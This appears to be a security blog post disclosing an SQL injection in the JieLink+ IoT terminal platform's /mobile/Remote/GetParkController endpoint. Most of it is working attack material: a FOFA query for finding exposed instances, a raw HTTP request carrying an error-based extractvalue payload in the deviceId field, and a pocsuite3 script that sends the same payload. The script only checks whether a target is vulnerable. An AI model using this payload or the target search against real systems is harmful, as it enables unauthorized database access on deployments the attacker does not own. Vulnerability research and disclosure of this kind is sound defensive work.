Disclaimer
The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.
Vulnerability description
This platform is an intelligent connection platform based on Internet of Things technology. It provides comprehensive features and services for managing and monitoring various IoT devices. The platform is highly customizable and can adapt to the needs of different industries and scenarios. Through this platform, users can monitor equipment status in real time, collect and analyze data, and perform remote control and scheduling operations. The platform also supports a variety of communication protocols and device access methods to achieve interconnection and interoperability between devices. At the same time, this platform provides a friendly user interface and powerful data management functions to help users quickly build and manage IoT systems. In short, this platform provides users with convenient and efficient IoT solutions and promotes the application and development of IoT technology.
fofa statement
title="JieLink+智能终端操作平台"poc statement plus detection
POST /mobile/Remote/GetParkController HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and'
poc script
pocsuite framework for scripts
# _*_ coding:utf-8 _*_
# @Time : 2023/12/12
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class JieLink_zhineng_sql(POCBase):
pocDesc = '''智能终端操作平台前台通用SQL注入漏洞'''
author = '炼金术师诸葛亮'
createDate = '2023-12-12'
name = '智能终端操作平台前台通用SQL注入漏洞'
def _verify(self):
result = {}
url = self.url+ '/mobile/Remote/GetParkController'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Accept": "application/json, text/plain, */*",
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'close',
'X-Requested-With': 'XMLHttpRequest',
"Content-Type": "application/x-www-form-urlencoded",
'Cookie': 'DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5'
}
try:
data = "deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and'"
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200 and 'error' in response.text:
result['VerifyInfo'] = {}
return self.parse_output(result)
except Exception as e:
pass
register_poc(JieLink_zhineng_sql)Script exploit
